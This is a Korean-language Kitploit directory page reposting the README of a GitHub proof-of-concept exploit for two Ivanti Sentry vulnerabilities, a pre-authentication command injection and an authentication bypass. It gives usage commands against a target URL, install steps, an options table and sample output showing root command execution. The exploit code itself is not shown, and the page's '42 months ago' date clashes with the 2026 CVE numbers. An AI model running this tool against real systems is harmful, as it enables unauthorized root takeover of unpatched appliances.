Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
도구/GitHubGitHub/0xblackash/cve-2026-10520
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

저장소 보기
42개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🎯 CVE-2026-10520 및 CVE-2026-10523 - Ivanti Sentry

ChatGPT Image Jun 11, 2026, 11_19_12 AM

Ivanti Sentry Critical RCE

사전 인증 원격 코드 실행 + 인증 우회

저자: Ashraf Zaryouh "0xBlackash"

GitHub


📌 개요

Ivanti Sentry(이전 MobileIron Sentry)에 영향을 미치는 두 가지 치명적인 취약점:

  • CVE-2026-10520 → CVSS 10.0 - 사전 인증 OS 명령 삽입 (루트 권한 RCE)
  • CVE-2026-10523 → CVSS 9.9 - 인증 우회

이러한 결함으로 인해 인증되지 않은 공격자가 시스템 전체를 장악할 수 있습니다.


✨ 기능

  • ✅ 깔끔하고 빠른 PoC
  • ✅ 사전 인증 (자격 증명 불필요)
  • ✅ 루트 권한 명령 실행
  • ✅ 상세 출력 포맷팅
  • ✅ 프록시 지원
  • ✅ 상세 모드
  • ✅ 아름다운 터미널 UI

🚀 사용법

root@kitploit:~
python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>

예제

root@kitploit:~
# 기본 사용법
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"

# 상세 모드
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v

# 프록시 사용
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080

# 커널 확인
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"

📋 옵션


🛠️ 설치

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py

📷 성공적인 익스플로잇

취약할 경우 다음과 같은 출력을 볼 수 있습니다:

root@kitploit:~

 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  
          CVE-2026-10520 & CVE-2026-10523 PoC Exploit
          Ivanti Sentry Pre-Auth RCE + Auth Bypass
          
          Author: Ashraf Zaryouh "0xBlackash"
          GitHub: https://github.com/0xBlackash


[+] 대상이 취약함!
명령 출력:
uid=0(root) gid=0(root) groups=0(root)

⚠️ 면책 조항

이 도구는 교육 및 승인된 보안 테스트 용도로만 사용하세요.
소유하지 않은 시스템에 대한 무단 사용은 불법입니다.
저자는 오용에 대해 책임을 지지 않습니다.


🔧 영향을 받는 버전

  • Ivanti Sentry 10.5.2, 10.6.2, 10.7.1 이전 버전

수정 버전: 10.5.2 / 10.6.2 / 10.7.1


📜 참고 자료

  • Ivanti 공식 권고
  • watchTowr Labs 원본 연구
  • NVD 항목: CVE-2026-10520, CVE-2026-10523

❤️를 담아 Ashraf Zaryouh "0xBlackash" 제작

유용하게 사용하셨다면 레포지토리에 별표를 눌러주세요! ⭐

도구 다운로드
인자설명필수 여부
--url대상 URL (예: https://target:8443)예
--cmd실행할 명령어예
-v, --verbose상세 출력 활성화아니요
--proxyHTTP 프록시 (호스트:포트)아니요